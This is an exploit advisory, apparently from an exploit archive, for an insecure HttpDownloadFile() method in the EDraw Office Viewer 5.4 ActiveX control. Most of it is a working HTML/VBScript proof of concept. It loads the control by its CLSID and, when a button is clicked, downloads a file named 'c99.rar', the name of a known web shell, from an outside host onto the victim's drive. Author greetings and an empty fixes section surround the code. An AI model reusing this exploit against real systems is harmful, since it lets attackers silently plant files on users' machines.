EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method Vulnerability

2009-01-14 07:34:45

EDraw Office Viewer 5.4 HttpDownloadFile() Insecure Method VulnEdraw Office Viewer Component v5.4 HttpDownloadFile() Insecure Method



Founded By : Cyber-Zone
E-mail : [email protected]
Home : WwW.Exploiter5.CoM
GreetZ : Houssamix , Hussin X , JiKo , StaCk , str0ke , The_5p3ctrum , BayHay , All Mgharba Wahed wahed Oujda 2009







<object classid='clsid:6BA21C22-53A5-463f-BBE8-5CF7FFA0132B' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<script language='vbscript'>
Sub tryMe
On Error Resume Next
test.HttpDownloadFile "http://exploiter5.com/Cyber-Zone/c99.rar", "c:\Cyber-Zone\c99.rar"
MsgBox("Done!")
End Sub
</script>
</span>
</code></pre>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.